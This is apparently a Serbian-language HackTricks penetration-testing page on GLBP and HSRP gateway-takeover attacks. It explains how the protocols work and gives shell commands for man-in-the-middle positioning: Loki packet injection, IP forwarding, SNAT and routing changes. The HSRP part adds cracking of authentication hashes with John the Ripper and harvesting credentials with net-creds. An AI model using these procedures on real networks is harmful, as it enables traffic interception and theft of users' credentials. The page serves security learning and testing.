GLBP & HSRP Attacks

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Pregled FHRP Preuzimanja

Uvidi u FHRP

FHRP je dizajniran da pruži mrežnu otpornost spajanjem više rutera u jedinicu, čime se poboljšava raspodela opterećenja i tolerancija na greške. Cisco Systems je uveo prominentne protokole u ovoj grupi, poput GLBP i HSRP.

Uvidi u GLBP Protokol

Cisco-ova kreacija, GLBP, funkcioniše na TCP/IP sloju, koristeći UDP na portu 3222 za komunikaciju. Ruteri u GLBP grupi razmenjuju "hello" pakete na intervalima od 3 sekunde. Ako ruter ne pošalje ove pakete tokom 10 sekundi, pretpostavlja se da je offline. Međutim, ovi tajmeri nisu fiksni i mogu se menjati.

Operacije i Raspodela Opterećenja u GLBP-u

GLBP se ističe omogućavanjem raspodele opterećenja preko rutera korišćenjem jedne virtuelne IP adrese uparene sa više virtuelnih MAC adresa. U GLBP grupi, svaki ruter učestvuje u prosleđivanju paketa. Za razliku od HSRP/VRRP, GLBP nudi pravo balansiranje opterećenja kroz nekoliko mehanizama:

  • Balansiranje Opterećenja Zavisno od Hosta: Održava konzistentno dodeljivanje AVF MAC adrese hostu, što je ključno za stabilne NAT konfiguracije.

  • Round-Robin Balansiranje Opterećenja: Podrazumevani pristup, koji menja dodeljivanje AVF MAC adrese među zahtevajućim hostovima.

  • Balansiranje Opterećenja Ponderisano Round-Robin: Raspodeljuje opterećenje na osnovu unapred definisanih metrika "Težine".

Ključni Komponenti i Terminologije u GLBP-u

  • AVG (Aktivni Virtuelni Gateway): Glavni ruter, odgovoran za dodeljivanje MAC adresa ruterima parova.

  • AVF (Aktivni Virtuelni Prosleđivač): Ruter određen za upravljanje mrežnim saobraćajem.

  • GLBP Prioritet: Metrika koja određuje AVG, počevši od podrazumevane vrednosti od 100 i krećući se između 1 i 255.

  • GLBP Težina: Odražava trenutno opterećenje na ruteru, podesivo ručno ili putem Praćenja Objekata.

  • GLBP Virtuelna IP Adresa: Služi kao podrazumevani gateway mreže za sve povezane uređaje.

Za interakcije, GLBP koristi rezervisanu multicast adresu 224.0.0.102 i UDP port 3222. Ruteri šalju "hello" pakete na intervalima od 3 sekunde i smatraju se neoperativnim ako se paket propusti tokom 10 sekundi.

Mehanizam Napada GLBP-a

Napadač može postati primarni ruter slanjem GLBP paketa sa najvišom vrednošću prioriteta (255). Ovo može dovesti do DoS ili MITM napada, omogućavajući presretanje ili preusmeravanje saobraćaja.

Izvođenje Napada GLBP-a pomoću Lokija

Loki može izvršiti GLBP napad ubacivanjem paketa sa postavljenim prioritetom i težinom na 255. Pre-napad koraci uključuju prikupljanje informacija poput virtuelne IP adrese, prisustva autentikacije i vrednosti prioriteta rutera korišćenjem alata poput Wireshark.

Koraci Napada:

  1. Prebacite se u promiskuitetni režim i omogućite IP prosleđivanje.

  2. Identifikujte ciljni ruter i dobijte njegovu IP adresu.

  3. Generišite Gratuitous ARP.

  4. Ubacite zlonamerni GLBP paket, predstavljajući se kao AVG.

  5. Dodelite sekundarnu IP adresu mrežnom interfejsu napadača, oponašajući GLBP virtuelnu IP.

  6. Implementirajte SNAT za potpunu vidljivost saobraćaja.

  7. Podesite rutiranje kako biste obezbedili nastavak pristupa internetu preko originalnog AVG rutera.

Prateći ove korake, napadač se pozicionira kao "čovek u sredini", sposoban za presretanje i analizu mrežnog saobraćaja, uključujući nešifrovane ili osetljive podatke.

Za demonstraciju, ovde su potrebni delovi komandi:

# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Pasivno objašnjenje HSRP preuzimanja sa detaljima komandi

Pregled HSRP (Hot Standby Router/Redundancy Protocol)

HSRP je Cisco vlasnički protokol dizajniran za redundanciju mrežnih gateway-a. Omogućava konfiguraciju više fizičkih rutera u jedinicu sa zajedničkom IP adresom. Ova logička jedinica je upravljana primarnim routerom odgovornim za usmeravanje saobraćaja. Za razliku od GLBP-a, koji koristi metrike poput prioriteta i težine za balansiranje opterećenja, HSRP se oslanja na jedan aktivni router za upravljanje saobraćajem.

Uloge i terminologija u HSRP-u

  • HSRP Aktivni Router: Uređaj koji deluje kao gateway, upravlja protokom saobraćaja.

  • HSRP Rezervni Router: Rezervni router, spreman da preuzme ulogu ako aktivni router zakaže.

  • HSRP Grupa: Skup rutera koji sarađuju kako bi formirali jedan otporan virtuelni router.

  • HSRP MAC Adresa: Virtuelna MAC adresa dodeljena logičkom routeru u HSRP postavci.

  • HSRP Virtuelna IP Adresa: Virtuelna IP adresa grupe HSRP, deluje kao podrazumevani gateway za povezane uređaje.

Verzije HSRP-a

HSRP dolazi u dve verzije, HSRPv1 i HSRPv2, koje se razlikuju uglavnom po kapacitetu grupe, korišćenju multicast IP adresa i strukturi virtuelne MAC adrese. Protokol koristi specifične multicast IP adrese za razmenu informacija o uslugama, sa Hello paketima koji se šalju svakih 3 sekunde. Router se smatra neaktivnim ako ne primi paket u intervalu od 10 sekundi.

Mehanizam napada na HSRP

Napadi na HSRP uključuju prisilno preuzimanje uloge Aktivnog Routera ubacivanjem maksimalne vrednosti prioriteta. Ovo može dovesti do napada čovek-u-sredini (MITM). Bitni koraci pre napada uključuju prikupljanje podataka o HSRP postavci, što se može uraditi korišćenjem Wireshark-a za analizu saobraćaja.

Koraci za zaobilaženje HSRP autentikacije

  1. Sačuvajte mrežni saobraćaj koji sadrži HSRP podatke kao .pcap fajl.

tcpdump -w hsrp_traffic.pcap
  1. Izdvojite MD5 heševe iz .pcap fajla koristeći hsrp2john.py.

python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
  1. Provalite MD5 heševe koristeći John the Ripper.

john --wordlist=mywordlist.txt hsrp_hashes

Izvršavanje HSRP ubacivanja pomoću Lokija

  1. Pokrenite Lokija da identifikujete HSRP oglase.

  2. Postavite mrežni interfejs u promiskuitetni režim i omogućite prosleđivanje IP adresa.

sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
  1. Koristite Lokija da ciljate određeni router, unesite provaljenu HSRP lozinku i izvršite neophodne konfiguracije da se predstavite kao Aktivni Router.

  2. Nakon što preuzmete ulogu Aktivnog Routera, konfigurišite svoj mrežni interfejs i IP tabele da presretnu legitimni saobraćaj.

sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  1. Izmenite rutiranje tabele da rutira saobraćaj preko prethodnog Aktivnog Routera.

sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
  1. Koristite net-creds.py ili sličan alat da uhvatite akreditacije iz presretnutog saobraćaja.

sudo python2 net-creds.py -i eth0

Izvršavanje ovih koraka stavlja napadača u poziciju da presretne i manipuliše saobraćajem, slično postupku za GLBP preuzimanje. Ovo ističe ranjivost u protokolima redundancije poput HSRP-a i potrebu za snažnim sigurnosnim merama.

Last updated